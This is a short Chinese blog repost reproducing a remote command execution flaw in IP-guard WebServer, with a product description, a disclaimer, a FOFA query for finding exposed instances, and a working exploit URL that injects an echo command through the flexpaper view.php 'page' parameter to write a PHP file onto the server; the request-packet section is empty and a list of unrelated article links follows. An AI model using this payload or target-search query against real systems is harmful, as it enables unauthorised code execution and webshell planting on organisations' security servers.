当前位置: 首页 > article >正文

【漏洞复现】IP-guard WebServer 存在远程命令执行漏洞

漏洞描述

IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。
在这里插入图片描述

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa   app="IP-guard"

漏洞复现

漏洞链接:http://127.0.0.1/ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=%7C%7Cecho+%3C?php+phpinfo();+?%3E+%3Esanyt.php
漏洞数据包:


                

http://www.kler.cn/a/137505.html

相关文章:

  • 【传统枪机现代枪机的功能需求】
  • Openwrt @ rk3568平台 固件编译实践(二)- ledeWRT版本
  • 全新免押租赁系统打造便捷安全的租赁体验
  • C++ 11,14,17 新特性
  • 道品科技智慧农业与云平台:未来农业的变革之路
  • EXCEL: (二) 常用图表
  • MySQL InnoDB 引擎底层解析(一)
  • 数据库-索引
  • 传输层协议-TCP协议
  • 键盘快捷键工具Keyboard Maestro mac中文版介绍
  • 【JVM】JVM异常不打印堆栈信息 [ -XX:-OmitStackTraceInFastThrow ]
  • 第十一章 目标检测中的NMS
  • RT-DETR优化策略:轻量级Backbone改进 | 高效模型 (Efficient MOdel, EMO),现代倒残差移动模块设计|ICCV2023
  • 【图像分类】【深度学习】【轻量级网络】【Pytorch版本】MobileNets_V2模型算法详解
  • No appropriate protocol -- Mysql
  • Docker-compose 安装mysql8
  • C# Onnx DIS高精度图像二类分割
  • 【云原生-Kurbernetes篇】K8s的存储卷/数据卷+PV与PVC
  • 趣学python编程 (三、计算机基础知识)
  • Ghidra逆向工具配置 MacOS 的启动台显示(Python)
  • linux中编写.sh脚本并赋权限问题
  • 深度学习之基于CT影像图像分割检测系统
  • 5.4 Windows驱动开发:内核通过PEB取进程参数
  • python之字符串
  • 结合两个Python小游戏,带你复习while循环、if判断、函数等知识点
  • 轿车5+1汽车变速器变速箱同步器操纵机构机械结构设计CAD汽车工程